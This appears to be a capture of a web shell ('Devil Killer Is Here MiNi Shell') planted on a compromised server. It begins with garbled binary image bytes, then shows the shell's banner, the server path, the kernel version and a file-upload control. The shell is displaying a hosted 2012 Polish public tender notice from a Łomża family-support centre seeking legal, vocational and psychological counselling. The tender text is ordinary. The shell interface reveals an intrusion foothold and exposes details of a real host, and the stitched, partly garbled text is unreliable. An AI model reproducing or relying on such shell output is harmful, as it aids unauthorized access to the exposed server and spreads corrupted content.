JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120614/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120614/203124-N-2012.html

<p class="kh_header"><b>Łomża: Przeprowadzenie poradnictwa, konsultacji prawnego indywidualnego, przeprowadzenie indywidualnego i grupowego doradztwa zawodowego oraz przeprowadzenie indywidualnych i grupowych konsultacji z psychologiem lub psychoterapeutą dla uczestników projektu Razem ku samodzielności - Integracja społeczna i zawodowa osób zagrożonych wykluczeniem społecznym i osób zgłaszających się do Punktu Doradczo-Konsultacyjnego działającego w ramach ww projektu.</b><br>
<b>Numer ogłoszenia: 203124 - 2012; data zamieszczenia: 14.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie w Łomży , ul. Szosa Zambrowska 1/27, 18-400 Łomża, woj. podlaskie, tel. (086) 215 69 42, faks (086) 215 69 70.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr.powiatlomzynski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie poradnictwa, konsultacji prawnego indywidualnego, przeprowadzenie indywidualnego i grupowego doradztwa zawodowego oraz przeprowadzenie indywidualnych i grupowych konsultacji z psychologiem lub psychoterapeutą dla uczestników projektu Razem ku samodzielności - Integracja społeczna i zawodowa osób zagrożonych wykluczeniem społecznym i osób zgłaszających się do Punktu Doradczo-Konsultacyjnego działającego w ramach ww projektu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest prowadzenie poradnictwa,konsultacji prawnego indywidualnego dla osób fizycznych, przeprowadzenie indywidualnego i grupowego doradztwa zawodowego oraz przeprowadzenie indywidualnych i grupowych konsultacji z psychologiem lub psychoterapeutą dla uczestników projektu Razem ku samodzielności - Integracja społeczna i zawodowa osób zagrożonych wykluczeniem społecznym i osób zgłaszających się do Punktu Doradczo-Konsultacyjnego działającego w ramach ww projektu. Beneficjentami ostatecznymi projektu systemowego są osoby niepełnosprawne, wychowankowie placówek opiekuńczo - wychowawczych, osoby z rodzin wielodzietnych i mających problemy opiekuńczo-wychowawcze, osoby bezrobotne i nieaktywne zawodowo, opiekunowie dzieci niepełnosprawnych.

Zamawiający zastrzega, iż może ulec niewielkiej zmianie liczba godzin konsultacji wskazanych w poszczególnych częściach zamówienia.
Zamawiający zastrzega sobie prawo do zmiany ( zmniejszenia) ilości godzin konsultacji wskazanych w poszczególnych częściach zamówienia, dlatego też podane zestawienie ilościowe nie jest wiążące dla Zamawiającego, natomiast dla  Wykonawcy jest wiążące pod względem wysokości ceny jednostkowej.

Zamówienie zostało podzielone na 3 części. 
 
Część I : Indywidualne poradnictwo prawne.  
Przedmiotem zamówienia jest przeprowadzenie 150 godzin konsultacji prawnych (1 godzina = 60 minut): w tym 60 godzin konsultacji dla uczestników projektu Razem ku samodzielności - Integracja społeczna i zawodowa osób zagrożonych wykluczeniem społecznym i 90 godzin konsultacji dla osób zgłaszających się do Punktu Doradczo-Konsultacyjnego działającego w ramach ww projektu. 

Miejscem wykonywania usługi będzie siedziba Powiatowego Centrum Pomocy Rodzinie w Łomży. Zamawiający użycza bezpłatnie miejsce wykonania usługi.
Daty i godziny zajęć będzie ustalać Zamawiający w konsultacji z Wykonawcą, zgodnie z zapotrzebowaniem zgłaszanym przez klientów. Porady będą udzielane w dni powszednie od poniedziałku do piątku w  godzinach od 8.00 do 17.00.  W związku z faktem, iż osoby korzystające z poradnictwa zgłaszają się do nas nieregularnie, Zamawiający będzie na bieżąco ustalać wraz z Wykonawcą  terminy dyżurów (wymaga się aby Wykonawca dysponował przynajmniej 3 godzinami w tygodniu).   
Zakres i tematyka porad prawnych związana będzie z indywidualnymi potrzebami klientów i obejmuje poradnictwo oraz sporządzanie pozwów, pism, wniosków i skarg.
Wśród najczęściej zgłaszanych problemów znajdują się zagadnienia m.in. z zakresu: 
1.	Prawa cywilnego: poradnictwo z zakresu prawa zobowiązań, postępowania nieprocesowego, postępowań nakazowych i upominawczych. 
2.	Prawa rodzinnego: poradnictwo oraz sporządzanie pozwów i pism procesowych w sprawach rozwodowych i separacyjnych, poradnictwo i sporządzanie pozwów, poradnictwo w zakresie rozdzielności majątkowej. 
3.	Prawa ubezpieczeń: poradnictwo z zakresu spraw emerytalno - rentowych, sporządzanie odwołań i pism procesowych w sprawach związanych z odwołaniami od decyzji ZUS. 
4.	Poradnictwa z zakresu prawa pracy. 
5.	Poradnictwa - wraz ze sporządzaniem pism, wniosków i skarg - w postępowaniu z zakresu egzekucji administracyjnej i sądowej. 
6.	Prawa lokalowego,. i ochrony praw lokatorów: sprawy dotyczące uzyskania lub odzyskania tytułu prawnego do lokalu poradnictwo z zakresu spraw dotyczących praw i obowiązków właścicieli, najemców, podnajemców itp. 

Termin wykonania: od daty zawarcia umowy do 7 grudnia 2012r. 

Część II: Indywidualne  oraz grupowe konsultacje z doradcą zawodowym. 
Przedmiotem zamówienia jest przeprowadzenie 200 godzin indywidualnego oraz grupowego doradztwa zawodowego (1 godzina = 60 minut): w tym 110 godzin konsultacji dla uczestników projektu Razem ku samodzielności - Integracja społeczna i zawodowa osób zagrożonych wykluczeniem społecznym i 90 godzin konsultacji dla osób zgłaszających się do Punktu Doradczo-Konsultacyjnego działającego w ramach ww projektu. 

Miejsce: Łomża, Jedwabne, Przytuły, Wizna. Zamawiający użycza bezpłatnie miejsce wykonania usługi.
Zamawiający zastrzega, iż konsultacje będą odbywać się w terminach wyznaczonych przez Zamawiającego. Porady będą udzielane w dni powszednie od poniedziałku do piątku w  godzinach od 8.00  do 17.00  oraz w soboty w godzinach od 8.00  do 17.00  . W związku z faktem, iż osoby korzystające z poradnictwa zgłaszają się do nas nieregularnie, Zamawiający będzie na bieżąco ustalać wraz z Wykonawcą  terminy dyżurów. 
Doradztwo powinno zmierzać do zdiagnozowania potrzeb społeczno zawodowych uczestnika konsultacji, poszerzenia wiedzy na temat rynku pracy i sposobów poruszania się po nim, uwzględniające potrzeby i możliwości uczestników konsultacji. 
W uwagi na fakt, iż Zamawiający przewiduje przeprowadzenie kilku szkoleń grupowych dla uczestników projektu z zakresu umiejętności miękkich niezbędnych do poruszania się na rynku pracy, wymaga się, aby osoba przewidziane do realizacji zamówienia posiadała obok wymaganego wykształcenia i 5-letniego doświadczenia zawodowego w pracy z klientami pomocy społecznej również potwierdzenie kwalifikacji zawodowych w obrębie zawodu wykładowca na kursach (trener).  

Termin wykonania: od daty zawarcia umowy do 7 grudnia 2012r. 

Część III: Indywidualne  oraz grupowe konsultacje z psychologiem lub psychoterapeutą
Przedmiotem zamówienia jest przeprowadzenie 130 godzin konsultacji psychologicznych (1 godzina=60 minut): w tym 90 godzin konsultacji dla uczestników projektu Razem ku samodzielności - Integracja społeczna i zawodowa osób zagrożonych wykluczeniem społecznym i 40 godzin konsultacji dla osób zgłaszających się do Punktu Doradczo-Konsultacyjnego działającego w ramach ww projektu.

Miejscem wykonywania usługi będzie siedziba Powiatowego Centrum Pomocy Rodzinie w Łomży. Zamawiający użycza bezpłatnie miejsce wykonania usługi.
Daty i godziny zajęć będzie ustalać Zamawiający, zgodnie z zapotrzebowaniem zgłaszanym przez klientów. Porady dla osób korzystających z porad w ramach Punktu będą udzielane w dni powszednie od poniedziałku do piątku w  godzinach od 8.00  do 17.00. W związku z faktem, iż osoby korzystające z poradnictwa zgłaszają się do nas nieregularnie, Zamawiający będzie na bieżąco ustalać wraz z Wykonawcą  terminy dyżurów ( wymaga się aby Wykonawca dysponował przynajmniej 3 godzinami w tygodniu). 
Natomiast w ramach godzin przewidzianych dla beneficjentów wymaga się, aby specjalista obok prowadzenia spotkań indywidualnych i psychoterapii rodzinnej uczestniczył również w spotkaniach Grupy Wsparcia dla opiekunów dzieci niepełnosprawnych: tj. około 3 spotkań stacjonarnych (odbywają się popołudniami w dni powszednie w siedzibie Zamawiającego) oraz w jednym spotkaniu wyjazdowym weekendowym.   Zakres i tematyka doradztwa związana będzie z indywidualnymi potrzebami klientów; Doradztwo powinno zmierzać do zdiagnozowania potrzeb społeczno zawodowych uczestnika konsultacji, poradnictwo świadczone na rzecz osób i rodzin mających trudności lub wykazujących potrzebę wsparcia w rozwiązywaniu problemów życiowych, w tym problemów interpersonalnych, wychowawczych,  psychospołecznych, problemów  dot. przemocy w rodzinie, czy opieki nad osobą niepełnosprawną. 

Termin wykonania: od daty zawarcia umowy do 7 grudnia 2012r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.11.10.00-5, 79.61.10.00-0, 85.12.12.70-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 07.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonali w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym czasie usługi polegające na zrealizowaniu poradnictwa prawnego w wymiarze co najmniej 150 godzin dla części I, poradnictwa zawodowego w wymiarze co najmniej 200 godzin dla części II, konsultacji z psychologiem/psychoterapeutą w wymiarze co najmniej 130 godzin dla części III - zgodnie z załącznikiem nr 4 lub 4a do specyfikacji istotnych warunków zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponuje osobami, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat posiadanych kwalifikacji, uprawnień, doświadczenia i wykształcenia w zakresie niezbędnym do wykonania zamówienia, oraz informację o podstawie dysponowania tymi osobami</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie - 50</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zmniejszenia się liczby godzin konsultacji, wysokość wynagrodzenia  zostanie obniżona proporcjonalnie do zmniejszenia się zakresu zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr.powiatlomzynski.pl, www.powiatlomzynski.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Łomży, ul. Szosa Zambrowska 1/27, 18-400 Łomża..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.06.2012 godzina 10:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Łomży, ul. Szosa Zambrowska 1/27, 18-400 Łomża. w sekretariacie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Operacyjny Kapitał Ludzki Poddziałania ,Poddziałania 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie Działanie 7.1 Priorytet VII. - Projekt Razem ku samodzielności- Integracja społeczna i zawodowa osób zagrożonych wykluczeniem społecznym współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Indywidualne poradnictwo prawne..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie 150 godzin konsultacji prawnych (1 godzina = 60 minut): w tym 60 godzin konsultacji dla uczestników projektu Razem ku samodzielności - Integracja społeczna i zawodowa osób zagrożonych wykluczeniem społecznym i 90 godzin konsultacji dla osób zgłaszających się do Punktu Doradczo-Konsultacyjnego działającego w ramach ww projektu. 

Miejscem wykonywania usługi będzie siedziba Powiatowego Centrum Pomocy Rodzinie w Łomży. Zamawiający użycza bezpłatnie miejsce wykonania usługi.
Daty i godziny zajęć będzie ustalać Zamawiający w konsultacji z Wykonawcą, zgodnie z zapotrzebowaniem zgłaszanym przez klientów. Porady będą udzielane w dni powszednie od poniedziałku do piątku w  godzinach od 8.00 do 17.00.  W związku z faktem, iż osoby korzystające z poradnictwa zgłaszają się do nas nieregularnie, Zamawiający będzie na bieżąco ustalać wraz z Wykonawcą  terminy dyżurów (wymaga się aby Wykonawca dysponował przynajmniej 3 godzinami w tygodniu).   
Zakres i tematyka porad prawnych związana będzie z indywidualnymi potrzebami klientów i obejmuje poradnictwo oraz sporządzanie pozwów, pism, wniosków i skarg.
Wśród najczęściej zgłaszanych problemów znajdują się zagadnienia m.in. z zakresu: 
1.	Prawa cywilnego: poradnictwo z zakresu prawa zobowiązań, postępowania nieprocesowego, postępowań nakazowych i upominawczych. 
2.	Prawa rodzinnego: poradnictwo oraz sporządzanie pozwów i pism procesowych w sprawach rozwodowych i separacyjnych, poradnictwo i sporządzanie pozwów, poradnictwo w zakresie rozdzielności majątkowej. 
3.	Prawa ubezpieczeń: poradnictwo z zakresu spraw emerytalno - rentowych, sporządzanie odwołań i pism procesowych w sprawach związanych z odwołaniami od decyzji ZUS. 
4.	Poradnictwa z zakresu prawa pracy. 
5.	Poradnictwa - wraz ze sporządzaniem pism, wniosków i skarg - w postępowaniu z zakresu egzekucji administracyjnej i sądowej. 
6.	Prawa lokalowego,. i ochrony praw lokatorów: sprawy dotyczące uzyskania lub odzyskania tytułu prawnego do lokalu poradnictwo z zakresu spraw dotyczących praw i obowiązków właścicieli, najemców, podnajemców itp..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.11.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 07.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Indywidualne  oraz grupowe konsultacje z doradcą zawodowym..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie 200 godzin indywidualnego oraz grupowego doradztwa zawodowego (1 godzina = 60 minut): w tym 110 godzin konsultacji dla uczestników projektu Razem ku samodzielności - Integracja społeczna i zawodowa osób zagrożonych wykluczeniem społecznym i 90 godzin konsultacji dla osób zgłaszających się do Punktu Doradczo-Konsultacyjnego działającego w ramach ww projektu. 

Miejsce: Łomża, Jedwabne, Przytuły, Wizna. Zamawiający użycza bezpłatnie miejsce wykonania usługi.
Zamawiający zastrzega, iż konsultacje będą odbywać się w terminach wyznaczonych przez Zamawiającego. Porady będą udzielane w dni powszednie od poniedziałku do piątku w  godzinach od 8.00  do 17.00  oraz w soboty w godzinach od 8.00  do 17.00  . W związku z faktem, iż osoby korzystające z poradnictwa zgłaszają się do nas nieregularnie, Zamawiający będzie na bieżąco ustalać wraz z Wykonawcą  terminy dyżurów. 
Doradztwo powinno zmierzać do zdiagnozowania potrzeb społeczno zawodowych uczestnika konsultacji, poszerzenia wiedzy na temat rynku pracy i sposobów poruszania się po nim, uwzględniające potrzeby i możliwości uczestników konsultacji. 
